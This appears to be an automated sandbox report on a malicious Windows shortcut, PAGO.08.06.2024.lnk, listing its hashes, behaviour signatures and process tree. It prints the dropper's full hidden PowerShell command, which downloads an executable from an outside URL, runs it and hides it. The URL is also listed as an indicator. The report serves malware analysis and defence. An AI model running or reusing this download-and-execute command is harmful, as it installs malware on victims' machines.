Analysis
-
max time kernel
14s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
07/08/2024, 09:17
Static task
static1
Behavioral task
behavioral1
Sample
Pago.08.06.2024/PAGO.08.06.2024.lnk
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
Pago.08.06.2024/PAGO.08.06.2024.lnk
Resource
win10v2004-20240802-en
General
-
Target
Pago.08.06.2024/PAGO.08.06.2024.lnk
-
Size
2KB
-
MD5
2749db3c6137622987d1a124be784379
-
SHA1
5f8dbf0c9c772fc2e22497588a108c81589feeda
-
SHA256
ff729a62292bcada3eb6fca5f5f2d69e47806def1af454357498d6b5ec1c4982
-
SHA512
14f574c6b9406f2533c9be8d316613f2d4acf381fd4840cb29a4bcf5fbb202c1cb3793dc3aa2ac2c41b20ada5f4289c28288f175fcf9f5bdc1c141b07235a806
Malware Config
Extracted
http://www.requimacofradian.site/dfjbhskdbfvsdsfgsh/slbrgkshbrshkhrfgsbrgkwrebysubrybsurbgarag/hsbidfhbgysdhgdsfhbgsnldjgnbjlsghf/dthsgs.exe
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2768 PoWeRsHeLl.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2768 PoWeRsHeLl.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2768 PoWeRsHeLl.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2152 wrote to memory of 2768 2152 cmd.exe 30 PID 2152 wrote to memory of 2768 2152 cmd.exe 30 PID 2152 wrote to memory of 2768 2152 cmd.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Pago.08.06.2024\PAGO.08.06.2024.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsHeLl.exe"C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsHeLl.exe" -ExecutionPolicy -Bypass -WindowStyle hiDdEn -HiDdEn --hidDeN ---HidDEn ---HiddeN -Command msadp32.acm;(new-object System.Net.WebClient).DownloadFile('http://www.requimacofradian.site/dfjbhskdbfvsdsfgsh/slbrgkshbrshkhrfgsbrgkwrebysubrybsurbgarag/hsbidfhbgysdhgdsfhbgsnldjgnbjlsghf/dthsgs.exe','doubles.exe');./'doubles.exe';(get-item 'doubles.exe').Attributes += 'Hidden';2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2768
-